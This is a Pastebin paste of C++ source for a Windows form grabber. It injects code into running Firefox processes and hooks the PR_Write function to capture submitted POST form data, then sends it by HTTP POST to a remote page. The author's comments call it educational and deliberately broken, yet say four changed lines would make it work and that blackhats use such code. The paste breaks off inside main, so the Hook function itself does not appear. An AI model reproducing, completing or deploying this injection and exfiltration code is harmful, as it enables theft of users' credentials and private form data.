Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*Ok, so firstly I created this purely for educational reasons. To prevent any Feds attempting to have a early morning party v& dance this code will not work. (You could make it work by changing 4 lines)
- If you get this working,use it maliciously and get arrested don't come crying to me.
- Now that's out the way here is the form grabber. Blackhats commonly use scripts similar to this to "grab" details from websites you visit. It's a simple c++ script that can run on admin or lower rights accounts.
- Remember this script is BROKEN. Firefox "patched" this method.*/
- #include <stdio.h>
- #include <windows.h>
- #include <string.h>
- #include <Tlhelp32.h>
- #include <wininet.h>
- #include <tchar.h>
- #define HTTP_PORT 80
- #define HTTP_POST "POST"
- #define HTTP_POST_HEADER "Content-Type:application/x-www-form-urlencoded"
- #define HTTP_REMOTE_SITE "localhost"
- #define HTTP_REMOTE_PAGE "/postDemo.php"
- #define FIREFOX_PROCESS TEXT("firefox.exe")
- #define FIREFOX_PR_WRITE "PR_Write"
- #define NSPR4_DLL "nspr4.dll"
- #define WININET_DLL "wininet.dll"
- #define KERNEL32_DLL "kernel32.dll"
- #define HOOK_CODE_SIZE 2000
- #define HOOK_ESP_DATA_OFFSET 0x08
- #define HOOK_ESP_DATA_SIZE 0x0C
- #define HOOK_ESP_ARG_0 0x04
- #define HOOK_POST_CMP 0x54534F50 // = TSOP (POST)
- #define HOOK_JMP 0xE9 // Jump near, relative, displacement relative to next instruction
- #define HOOK_INT3 0xCC
- #define HOOK_JMP_INST_SIZE 0x01
- #define HOOK_INT3_SIZE 0x01
- #define HOOK_ADDRESS_SIZE_32 0x04
- #define HOOK_ADDRESS_SIZE_64 0x08
- #define HOOK_REL_JMP_OFFSET_32 (HOOK_JMP_INST_SIZE + HOOK_ADDRESS_SIZE_32) // 5
- #define HOOK_REL_JMP_OFFSET_64 (HOOK_JMP_INST_SIZE + HOOK_ADDRESS_SIZE_64) // 9
- #define HOOK_PARAM1_OFFSET_32 0x08
- #define HOOK_LOCALVAR1_OFFSET_32 0x04 // Should be
- #define PR_WRITE_JMP_VP_SIZE 0x06 // 0x0A for 64 bits
- typedef HMODULE (WINAPI *FnGetModuleHandle) (LPCTSTR);
- typedef FARPROC (WINAPI *FnGetProcAddress) (HMODULE,LPCSTR);
- typedef int (WINAPI *FnVirtualProtect) (LPVOID,SIZE_T,DWORD,PDWORD);
- typedef HINTERNET (WINAPI *FnInternetOpen) (LPCTSTR,DWORD,LPCTSTR,LPCTSTR,DWORD);
- typedef HINTERNET (WINAPI *FnInternetConnect)(HINTERNET,LPCTSTR,INTERNET_PORT,LPCTSTR,LPCTSTR,DWORD,DWORD,DWORD_PTR);
- typedef HINTERNET (WINAPI *FnHttpOpenRequest) (HINTERNET,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR*,DWORD,DWORD_PTR);
- typedef BOOL (WINAPI *FnHttpSendRequest)(HINTERNET,LPCTSTR,DWORD,LPVOID,DWORD);
- typedef VOID (WINAPI *FnSleep)(DWORD);
- typedef struct {
- FnGetModuleHandle fnGetModuleHandle; // GetModuleHandle
- FnGetProcAddress fnGetProcAddress; // GetProcAddress
- FnVirtualProtect fnVirtualProtect; // VirtualProtect
- FnSleep fnSleep; // Sleep
- char nameNspr4[36]; // "nspr4.dll"
- char namePR_Write[36]; // "PR_Write"
- BYTE *PR_Write;
- BYTE *nptr;
- DWORD *bptr;
- DWORD oldProtectValue;
- char blank[3]; // ""
- char remoteSite[16]; // "localhost"
- char post[10]; // "POST"
- char pageName[16]; // "/visit.php"
- char header[64]; // "Content-Type:application/x-www-form-urlencoded"
- HINTERNET fnOpenHandle;
- HINTERNET fnConnectHandle;
- HINTERNET internetHandle;
- int postDataLength;
- char *pPostData;
- FnInternetOpen fnInternetOpen;
- FnInternetConnect fnInternetConnect;
- FnHttpOpenRequest fnHttpOpenRequest;
- FnHttpSendRequest fnHttpSendRequest;
- int addressSize; // 4, or 8 on 64 bit CPUs
- } InjectData;
- void Hook(InjectData *pData);
- int main() {
- InjectData data;
- LPVOID pRemoteProgram, pRemoteMemory;
- HANDLE rThread;
- HMODULE kernel32;
- HMODULE wininet;
- HANDLE handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
- PROCESSENTRY32 ProcessInfo;
- ProcessInfo.dwSize = sizeof(PROCESSENTRY32);
- LoadLibraryA( WININET_DLL );
- wininet = GetModuleHandleA( WININET_DLL );
- kernel32 = GetModuleHandleA( KERNEL32_DLL );
- data.fnGetModuleHandle = (FnGetModuleHandle) GetProcAddress( kernel32,"GetModuleHandleA" );
- data.fnGetProcAddress = (FnGetProcAddress) GetProcAddress( kernel32, "GetProcAddress" );
- data.fnVirtualProtect = (FnVirtualProtect) GetProcAddress( kernel32, "VirtualProtect" );
- data.fnSleep = (FnSleep) GetProcAddress( kernel32, "Sleep" );
- data.fnInternetOpen = (FnInternetOpen) GetProcAddress( wininet, "InternetOpenA" );
- data.fnInternetConnect = (FnInternetConnect) GetProcAddress( wininet, "InternetConnectA" );
- data.fnHttpOpenRequest = (FnHttpOpenRequest) GetProcAddress( wininet, "HttpOpenRequestA" );
- data.fnHttpSendRequest = (FnHttpSendRequest) GetProcAddress( wininet, "HttpSendRequestA" );
- strcpy( data.nameNspr4, NSPR4_DLL );
- strcpy( data.namePR_Write, FIREFOX_PR_WRITE );
- strcpy( data.remoteSite, HTTP_REMOTE_SITE );
- strcpy( data.post, HTTP_POST );
- strcpy( data.pageName, HTTP_REMOTE_PAGE);
- strcpy( data.header, HTTP_POST_HEADER );
- strcpy( data.blank, "");
- data.addressSize = sizeof( BYTE * ); // size of a pointer
- while(Process32Next(handle, &ProcessInfo))
- {
- // strcmp on ANSI, wcscmp on UNICODE
- if(! _tcscmp(ProcessInfo.szExeFile, FIREFOX_PROCESS))
- {
- HANDLE firefoxHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, ProcessInfo.th32ProcessID);
- pRemoteMemory = VirtualAllocEx( firefoxHandle, NULL, sizeof(data), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
- WriteProcessMemory(firefoxHandle, pRemoteMemory, &data, sizeof(data), NULL);
- pRemoteProgram = VirtualAllocEx( firefoxHandle, NULL, HOOK_CODE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
- WriteProcessMemory(firefoxHandle, pRemoteProgram, Hook, HOOK_CODE_SIZE, NULL);
- rThread = CreateRemoteThread( firefoxHandle, NULL, 0, (LPTHREAD_START_ROUTINE) pRemoteProgram, pRemoteMemory, 0 ,NULL);
- WaitForSingleObject( rThread, INFINITE);
- CloseHandle(firefoxHandle);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement